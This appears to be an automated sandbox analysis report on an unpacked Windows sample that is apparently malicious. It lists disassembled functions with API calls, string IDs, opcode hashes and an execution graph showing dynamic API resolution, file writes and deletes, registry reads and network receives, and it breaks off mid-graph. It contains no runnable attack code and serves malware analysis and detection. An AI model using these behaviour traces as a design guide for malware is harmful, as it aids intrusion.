                          • Instruction ID: 45c4d4f9bbb270077a7a3530f78740e340acc6befb4c7b60b57660e2b99362dc
                          • Opcode Fuzzy Hash: c4e0003f20ac0bdd6235f8c1352beef51fc5a9158c7f5474fb38db59637b0dc0
                          • Instruction Fuzzy Hash: 038142B69002189BDB14DBA4CD89BDEB774FF58304F0085A9E11A772D1DB785A88CF68
                          Function 0042D313 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042D347
                          • __isleadbyte_l.LIBCMT ref: 0042D37A
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 0042D3AB
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 0042D419
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 9d2230088cd871af93d1a5136c05a0a66863d2ece9912571f859f81350fc7cb1
                          • Instruction ID: aaa7b1223996daabf0532f3b1482f085f54885d9027b65670956d2fec97621d6
                          • Opcode Fuzzy Hash: 9d2230088cd871af93d1a5136c05a0a66863d2ece9912571f859f81350fc7cb1
                          • Instruction Fuzzy Hash: 5131C231F00265EFDB20DF64E8849AE7BA5FF01311F94856AF8A18B291D334DD40DB9A
                          Function 00402744 Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcmpiW.KERNEL32(?,-00476118,00000000,?,?,?,?,?), ref: 0040277C
                          • _memset.LIBCMT ref: 004027A1
                          • lstrcpyW.KERNEL32(?,-00476118,?,?,?,?,?,?,?), ref: 004027BF
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402805
                            • Part of subcall function 00402AA0: construct.LIBCPMTD ref: 00402B29
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset_wcsrchrconstructlstrcmpi
                          • String ID:
                          • API String ID: 2078099069-0
                          • Opcode ID: 9ab7fae23a6cd178379b9f1f18c38669220ae0b06b42f2b867ea3ad8665003dc
                          • Instruction ID: 3d16b77e17d9a283d974e3b2d9caf2aabd6e780921b8546b30b3bbda698c7617
                          • Opcode Fuzzy Hash: 9ab7fae23a6cd178379b9f1f18c38669220ae0b06b42f2b867ea3ad8665003dc
                          • Instruction Fuzzy Hash: F0416072D002189BCB14DF64CD8CBDEB775EF98304F4086A9E10AB7291DB799A84CF58
                          Function 00422E80 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?), ref: 00422ED6
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00422EFA
                          • CloseHandle.KERNEL32(?), ref: 00422F1C
                          • CloseHandle.KERNEL32(?), ref: 00422F3E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 39f7e74eae33062841a8175173220392bd2f5044482dd973a01b7ec866e0e755
                          • Instruction ID: 806f4d51c55cd5237a4c8eb056a33d06353d7b9500c599e1f4b9eb86b28f91e2
                          • Opcode Fuzzy Hash: 39f7e74eae33062841a8175173220392bd2f5044482dd973a01b7ec866e0e755
                          • Instruction Fuzzy Hash: 4E2180B1600104ABDB4CCF48E7D8B7CBBB5EB95308F5610AFD10AAF6A1C7749981DB18
                          Function 00430723 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                          • Instruction ID: 700365fc3ef55c6608dcef6f61c33953fe9cf20e4b8c489e702210f7e9730dcc
                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                          • Instruction Fuzzy Hash: 1111833240014DBBCF265E84DC62CEE3F22BB0C394F189616FA1858130C73AD972AF85
                          Function 0041D930 Relevance: 6.0, APIs: 4, Instructions: 46synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041D967
                          • CloseHandle.KERNEL32(?), ref: 0041D978
                          • CloseHandle.KERNEL32(?), ref: 0041D985
                          • LocalFree.KERNEL32(00000000), ref: 0041D99F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 2545295749-0
                          • Opcode ID: 863dc07376620fff7da24d9174c5540299efa758a59c26d6f6e4e2106d0de0e2
                          • Instruction ID: b3d0a684532f22b24a61b5f16c014b4f3157037c9e20523ee33484da4440396a
                          • Opcode Fuzzy Hash: 863dc07376620fff7da24d9174c5540299efa758a59c26d6f6e4e2106d0de0e2
                          • Instruction Fuzzy Hash: 311109B9E14208EFCB04DF94D988ADEBBB5FF88301F208199E9095B350D734AE85DB55
                          Function 004157D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 403COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • _memset.LIBCMT ref: 004158B4
                          • __snwprintf.LIBCMT ref: 004158D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt$__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2629772119-297323700
                          • Opcode ID: 08fdabdd88a08ad3748058d96fb195c2a0972b770053efd6c9ddf30f98aba3c1
                          • Instruction ID: cea314f64e5e40574c56c82fe0e1a28e51779384d737c773d0872d5a6df9b95d
                          • Opcode Fuzzy Hash: 08fdabdd88a08ad3748058d96fb195c2a0972b770053efd6c9ddf30f98aba3c1
                          • Instruction Fuzzy Hash: 4B024DB0900618DBEB24DF54DC49FEEB374BB88304F5082AAE219A7291D7745EC5CF69
                          Function 00417160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmovelstrcpy
                          • String ID: .DLL
                          • API String ID: 1936325922-899428287
                          • Opcode ID: 206a35d59d9e2d740689b334e1245c5ab36b3454765dd59f3c4bdf7655c760d5
                          • Instruction ID: c994f9a7622422d88fdc74f0b5569615fd03aa757a2c998ac84d832c9b8b4781
                          • Opcode Fuzzy Hash: 206a35d59d9e2d740689b334e1245c5ab36b3454765dd59f3c4bdf7655c760d5
                          • Instruction Fuzzy Hash: CE514971A04218EBCB25CF94DC88FDDB7B5EB4C300F5085A9F659A7290C6B4AAC4DF58
                          Function 004178A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • _memset.LIBCMT ref: 00417915
                          • __snwprintf.LIBCMT ref: 00417933
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset_wcsrchr
                          • String ID: SOFTWARE\%s
                          • API String ID: 2041709146-297323700
                          • Opcode ID: 161eb108a0679f5d3ddfddbe3ccd982563bc54e903ca1800756906d2f2878241
                          • Instruction ID: 6479d5e764fcb64d0c7f3370c6cf7eeb3759984951b727dfcb9730a64198a9bd
                          • Opcode Fuzzy Hash: 161eb108a0679f5d3ddfddbe3ccd982563bc54e903ca1800756906d2f2878241
                          • Instruction Fuzzy Hash: F43184B5A14208BBDB14DBA0DC49FEE7778FF44700F5085A9F509A7280D7799A88CF58
                          Function 004069F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 5ba5ccad96fceb57a24ead9c0c6bdca8ce5eca305943ad0a8fe1ca6a856502be
                          • Instruction ID: 8c345f43bd84863ed8d839e80dad8bcf226fe1c04e4c0914365b140f81968092
                          • Opcode Fuzzy Hash: 5ba5ccad96fceb57a24ead9c0c6bdca8ce5eca305943ad0a8fe1ca6a856502be
                          • Instruction Fuzzy Hash: CF215E74B44308BBDB20DBA0DC4EFAA7778EF48704F5084A9B609B61C1E7B55A48DB58
                          Function 00404610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 421192caa86c426d7e4603242c2833235c156fbefb79f4a68f0577cd9d758480
                          • Instruction ID: f50a489c0aae7273e8ae771a1e99404477289d93a2267ec611ba37a8f37f4417
                          • Opcode Fuzzy Hash: 421192caa86c426d7e4603242c2833235c156fbefb79f4a68f0577cd9d758480
                          • Instruction Fuzzy Hash: 0B11CC75740308BBE720DBA0DC4AFBA7378AF84B00F504569B70CA65C0E6B9AA549799
                          Function 00405060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 44b8aa7e25b707e9ab68fc0f49db161d0d079494426bfef0ae8f619570b095de
                          • Instruction ID: 810907f3e6488bf77ea5ec11b213ac1b4f10b15ab591894c8a2340feb0e9f545
                          • Opcode Fuzzy Hash: 44b8aa7e25b707e9ab68fc0f49db161d0d079494426bfef0ae8f619570b095de
                          • Instruction Fuzzy Hash: 4C118875B44308BBE720DBA0DC4AFAB7728EB44B00F504169B70DBA1C1E6F59A44DB9D
                          Function 00428676 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0042959E: DecodePointer.KERNEL32(0043C8B0,00000008,00428C90,E06D7363,1FFFFFFF,19930522,?,0042481B,?,?,?,?,?,00000000,00000000,00000000), ref: 004295B0
                            • Part of subcall function 00429552: __getptd.LIBCMT ref: 0042955E
                            • Part of subcall function 00429552: _abort.LIBCMT ref: 00429580
                          • ___TypeMatch.LIBCMT ref: 004286BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodeMatchPointerType__getptd_abort
                          • String ID: bad exception$csm
                          • API String ID: 284225101-1249633139
                          • Opcode ID: 0b6bcc1c17bbd0743a3b509b9db8e4bdde75f2ff7156fed5a729dd991485ddb9
                          • Instruction ID: 036d0ee341f43b6dde09129cd0c20801f7c8771f379164f775a2ba672f5755eb
                          • Opcode Fuzzy Hash: 0b6bcc1c17bbd0743a3b509b9db8e4bdde75f2ff7156fed5a729dd991485ddb9
                          • Instruction Fuzzy Hash: 2F018071B05219AFCB00DFA9E48099DBBB4FF04318F5480AAEC04D7302DB35E945CB59
                          Function 0042885B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00424A9A: __getptd.LIBCMT ref: 00424AA0
                            • Part of subcall function 00424A9A: __getptd.LIBCMT ref: 00424AB0
                          • __getptd.LIBCMT ref: 0042886A
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 00428878
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: b539d4ac56a18326630a3c3e66a25a22088bc947c12ff966933e7d030b28235b
                          • Instruction ID: 0d246e1c7647cd66f0475fb7c6c5131747531dd188f062191e47b90da6a84a47
                          • Opcode Fuzzy Hash: b539d4ac56a18326630a3c3e66a25a22088bc947c12ff966933e7d030b28235b
                          • Instruction Fuzzy Hash: 9C012434A02225DACF34AF75E4406AEB3B5AF10311FE4486FE44196791DF389980DB59
                          Function 0042832F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DecodePointer.KERNEL32(?,00428368,00000000,00000000,00000000,00000000,00000000,0042EB57,?,0042A98C,00000003,0042D754,0043C9D0,0000000C,0042D810,00405B83), ref: 0042833A
                          • __invoke_watson.LIBCMT ref: 00428356
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer__invoke_watson
                          • String ID: BWB
                          • API String ID: 4034010525-3782699923
                          • Opcode ID: a1caaad592fa34f26481d55f137f108f7716ebe80e2a6b6d49935f99d5524c00
                          • Instruction ID: 98f8f152122dd42cc451d7698d7a8a267dea8e09b4c4ed78da15ec27e8bb817c
                          • Opcode Fuzzy Hash: a1caaad592fa34f26481d55f137f108f7716ebe80e2a6b6d49935f99d5524c00
                          • Instruction Fuzzy Hash: 98E0B63220014DBBCF126FA2AC099AE3A6AAF44750B940469FD1484521DB3BD871EB98
                          Function 0041C6CD Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 95f2d89126de09528606904b127f85e58ef1d5f2467f5d375e8ba34d0f88afc0
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: 95f2d89126de09528606904b127f85e58ef1d5f2467f5d375e8ba34d0f88afc0
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19
                          Function 0041C6F1 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: a75f2d1bb2743436d940e3abceb4b60f0ba55c646f9781cfafbd897f512c2d85
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: a75f2d1bb2743436d940e3abceb4b60f0ba55c646f9781cfafbd897f512c2d85
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19
                          Function 0041C717 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: c3b0eb91f741efb3bcda686cd5d759f91907120e7356ca82b976fb4c33612c43
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: c3b0eb91f741efb3bcda686cd5d759f91907120e7356ca82b976fb4c33612c43
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19

                          Execution Graph

                          Execution Coverage:8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:1.6%
                          Total number of Nodes:1612
                          Total number of Limit Nodes:47
                          execution_graph 20352 11b3520 20355 11b3550 20352->20355 20353 11b357b 20354 11b4630 5 API calls 20354->20355 20355->20353 20355->20354 20357 11b34a0 recv 20355->20357 20357->20355 17626 11a8d53 17627 11a8d63 17626->17627 17628 11a8e61 LoadLibraryW 17627->17628 17629 11a8d7f 17627->17629 17630 11a8dfc GetProcAddress 17627->17630 17631 11a8df3 17628->17631 17632 11a8e82 17628->17632 17637 11a8dac GetProcAddressForCaller 17629->17637 17633 11a8dfa 17630->17633 17634 11a8e55 17630->17634 17635 11a8eb1 17632->17635 17636 11a8f97 LoadLibraryW 17632->17636 17633->17628 17634->17631 17638 11a8ebb 17635->17638 17639 11a8f35 GetProcAddress 17635->17639 17636->17631 17640 11a8fb8 17636->17640 17637->17631 17637->17633 17644 11a8ee8 GetProcAddress 17638->17644 17639->17634 17641 11a8f92 17639->17641 17642 11a90cd LoadLibraryW 17640->17642 17643 11a8fe7 17640->17643 17641->17636 17642->17631 17648 11a90ee 17642->17648 17645 11a906b GetProcAddress 17643->17645 17646 11a8ff1 17643->17646 17644->17634 17647 11a8f33 17644->17647 17645->17634 17649 11a90c8 17645->17649 17650 11a901e GetProcAddress 17646->17650 17647->17641 17651 11a911d 17648->17651 17652 11a9203 LoadLibraryExW 17648->17652 17649->17642 17650->17634 17653 11a9069 17650->17653 17655 11a91a1 GetProcAddress 17651->17655 17656 11a9127 17651->17656 17652->17631 17654 11a922a 17652->17654 17653->17649 17659 11a9259 17654->17659 17660 11a9345 LoadLibraryW 17654->17660 17655->17634 17657 11a91fe 17655->17657 17658 11a9154 GetProcAddress 17656->17658 17657->17652 17658->17634 17661 11a919f 17658->17661 17663 11a9263 17659->17663 17664 11a92e0 GetProcAddress 17659->17664 17660->17631 17662 11a9366 17660->17662 17661->17657 17666 11a947b LoadLibraryW 17662->17666 17667 11a9395 17662->17667 17668 11a9290 GetProcAddress 17663->17668 17664->17634 17665 11a9340 17664->17665 17665->17660 17666->17631 17670 11a94a2 17666->17670 17671 11a9419 GetProcAddress 17667->17671 17672 11a939f 17667->17672 17668->17634 17669 11a92de 17668->17669 17669->17665 17674 11a95bd LoadLibraryExW 17670->17674 17675 11a94d1 17670->17675 17671->17634 17673 11a9476 17671->17673 17676 11a93cc GetProcAddress 17672->17676 17673->17666 17674->17631 17677 11a95de 17674->17677 17678 11a94db 17675->17678 17679 11a9558 GetProcAddress 17675->17679 17676->17634 17680 11a9417 17676->17680 17682 11a960d 17677->17682 17683 11a96f3 LoadLibraryExW 17677->17683 17684 11a9508 GetProcAddress 17678->17684 17679->17634 17681 11a95b8 17679->17681 17680->17673 17681->17674 17686 11a9691 GetProcAddress 17682->17686 17687 11a9617 17682->17687 17683->17631 17685 11a971a 17683->17685 17684->17634 17688 11a9556 17684->17688 17690 11a9749 17685->17690 17691 11a9835 LoadLibraryExW 17685->17691 17686->17634 17689 11a96ee 17686->17689 17692 11a9644 GetProcAddress 17687->17692 17688->17681 17689->17683 17693 11a9753 17690->17693 17694 11a97d0 GetProcAddress 17690->17694 17691->17631 17696 11a9856 17691->17696 17692->17634 17695 11a968f 17692->17695 17700 11a9780 GetProcAddress 17693->17700 17694->17634 17697 11a9830 17694->17697 17695->17689 17698 11a996b LoadLibraryExW 17696->17698 17699 11a9885 17696->17699 17697->17691 17698->17631 17704 11a998c 17698->17704 17701 11a9909 GetProcAddress 17699->17701 17702 11a988f 17699->17702 17700->17634 17703 11a97ce 17700->17703 17701->17634 17705 11a9966 17701->17705 17706 11a98bc GetProcAddress 17702->17706 17703->17697 17707 11a9aa1 LoadLibraryExW 17704->17707 17709 11a9a3f GetProcAddress 17704->17709 17710 11a99c5 17704->17710 17705->17698 17706->17634 17708 11a9907 17706->17708 17707->17631 17711 11a9ac2 17707->17711 17708->17705 17709->17634 17712 11a9a3d 17709->17712 17713 11a99f2 GetProcAddressForCaller 17710->17713 17714 11a9af1 17711->17714 17715 11a9bd7 LoadLibraryExW 17711->17715 17712->17707 17713->17631 17713->17712 17716 11a9afb 17714->17716 17717 11a9b75 GetProcAddress 17714->17717 17715->17631 17722 11a9bf8 17715->17722 17719 11a9b28 GetProcAddress 17716->17719 17717->17634 17718 11a9bd2 17717->17718 17718->17715 17719->17634 17720 11a9b73 17719->17720 17720->17718 17721 11a9ca8 GetProcAddress 17721->17634 17721->17722 17722->17631 17724 11a9c27 17722->17724 17723 11a9c5e GetProcAddress 17723->17634 17723->17724 17724->17721 17724->17722 17724->17723 17725 11a7b60 17726 11a7b86 17725->17726 17738 11a7ba0 17725->17738 17727 11a7b8d 17726->17727 17728 11a7ba4 17726->17728 17729 11a7bb0 17727->17729 17730 11a7b94 17727->17730 17740 119fba0 17728->17740 17734 119fba0 114 API calls 17729->17734 17732 11a7b9e DefWindowProcW 17730->17732 17733 11a7bbc 17730->17733 17732->17738 17735 11a7bc4 17733->17735 17733->17738 17739 11a7ba9 17734->17739 17737 119fba0 114 API calls 17735->17737 17737->17739 17739->17738 17765 119f510 17740->17765 17743 119fbd1 CreateDirectoryW 17745 119fbe3 GetLastError 17743->17745 17746 119fbf4 LocalAlloc 17743->17746 17744 119fd7d 17744->17739 17745->17746 17747 119fd6a 17745->17747 17746->17747 17748 119fc15 17746->17748 17747->17744 17750 119fd72 LocalFree 17747->17750 17774 11b84a8 17748->17774 17750->17744 17752 119fc8b 17753 119fd57 17752->17753 17754 119fc9d 17752->17754 17787 1198f40 17752->17787 17753->17747 17755 119fd5f LocalFree 17753->17755 17756 119fd11 LocalFree LocalFree 17754->17756 17755->17747 17756->17744 17759 119fd39 17763 119fd4c DeleteFileW 17759->17763 17764 119fd41 CloseHandle 17759->17764 17760 119fcd0 WriteFile 17761 119fcfd CloseHandle 17760->17761 17762 119fd2e LocalFree 17760->17762 17761->17756 17762->17759 17763->17753 17764->17763 17794 119f410 17765->17794 17768 119f64d 17768->17743 17768->17744 17769 119f595 lstrlenW lstrlenW LocalAlloc 17770 119f5ef 17769->17770 17771 119f642 CoTaskMemFree 17769->17771 17772 11b84a8 89 API calls 17770->17772 17771->17768 17773 119f61b lstrlenW CoTaskMemFree 17772->17773 17773->17768 17777 11b84da _snprintf 17774->17777 17775 11b84df 17776 11baa70 _errno 62 API calls 17775->17776 17779 11b84e4 17776->17779 17777->17775 17778 11b8501 17777->17778 17796 11b9d1c 17778->17796 17780 11baa08 _invalid_parameter_noinfo 17 API calls 17779->17780 17785 119fc3c CreateFileW GetLastError 17780->17785 17783 11b8547 17783->17785 17786 11b9a64 write_char 82 API calls 17783->17786 17785->17752 17786->17785 17788 11b84a8 89 API calls 17787->17788 17789 1198f78 RegGetValueW 17788->17789 17790 119903e 17789->17790 17791 1198fd6 LocalAlloc 17789->17791 17790->17759 17790->17760 17791->17790 17792 1198ff4 RegGetValueW 17791->17792 17792->17790 17793 1199053 LocalFree 17792->17793 17793->17790 17795 119f426 SHGetKnownFolderPath 17794->17795 17795->17768 17795->17769 17839 11b951c 17796->17839 17799 11baa70 _errno 62 API calls 17812 11b9d90 std::exception::operator= _snprintf 17799->17812 17800 11b9d9c 17801 11baa70 _errno 62 API calls 17800->17801 17802 11b9da1 17801->17802 17803 11baa08 _invalid_parameter_noinfo 17 API calls 17802->17803 17804 11b9dac 17803->17804 17805 11bc5e0 _cftoe_l 8 API calls 17804->17805 17806 11b853b 17805->17806 17806->17783 17806->17785 17818 11b9a64 17806->17818 17807 11ba345 DecodePointer 17807->17812 17808 11c06cc __setargv 62 API calls 17808->17812 17809 11c0870 64 API calls 17809->17812 17810 11bc600 free 62 API calls 17810->17812 17811 11b9c80 84 API calls 17811->17812 17812->17800 17812->17804 17812->17807 17812->17808 17812->17809 17812->17810 17812->17811 17813 11ba39d DecodePointer 17812->17813 17814 11ba3c2 DecodePointer 17812->17814 17816 11b9bf4 84 API calls write_char 17812->17816 17817 11b9c2c 84 API calls write_multi_char 17812->17817 17847 11c09f0 17812->17847 17813->17812 17814->17812 17816->17812 17817->17812 18128 11c046c 17818->18128 17821 11b9aa8 17823 11b9aad 17821->17823 17833 11b9aba write_char 17821->17833 17822 11b9a91 17824 11baa70 _errno 62 API calls 17822->17824 17825 11baa70 _errno 62 API calls 17823->17825 17826 11b9a96 17824->17826 17825->17826 17826->17783 17827 11b9b1f 17828 11b9bb9 17827->17828 17829 11b9b2c 17827->17829 17830 11c00c4 _flush 82 API calls 17828->17830 17831 11b9b48 17829->17831 17835 11b9b61 17829->17835 17830->17826 18145 11c00c4 17831->18145 17833->17826 17833->17827 17836 11b9b13 17833->17836 18134 11c01f8 17833->18134 17835->17826 18169 11bf880 17835->18169 17836->17827 18142 11c01a4 17836->18142 17840 11b952e 17839->17840 17844 11b958f 17839->17844 17850 11bad98 17840->17850 17843 11b9568 17843->17844 17869 11bdb44 17843->17869 17844->17799 17848 11b951c _cftof_l 62 API calls 17847->17848 17849 11c0a02 17848->17849 17849->17812 17851 11bad14 _errno 62 API calls 17850->17851 17852 11bada3 17851->17852 17853 11b9533 17852->17853 17854 11be968 _amsg_exit 62 API calls 17852->17854 17853->17843 17855 11be414 17853->17855 17854->17853 17856 11bad98 _getptd 62 API calls 17855->17856 17857 11be41f 17856->17857 17858 11be448 17857->17858 17859 11be43a 17857->17859 17860 11c0c94 _lock 62 API calls 17858->17860 17861 11bad98 _getptd 62 API calls 17859->17861 17862 11be452 17860->17862 17863 11be43f 17861->17863 17880 11be3bc 17862->17880 17867 11be480 17863->17867 17868 11be968 _amsg_exit 62 API calls 17863->17868 17867->17843 17868->17867 17870 11bad98 _getptd 62 API calls 17869->17870 17871 11bdb53 17870->17871 17872 11bdb6e 17871->17872 17873 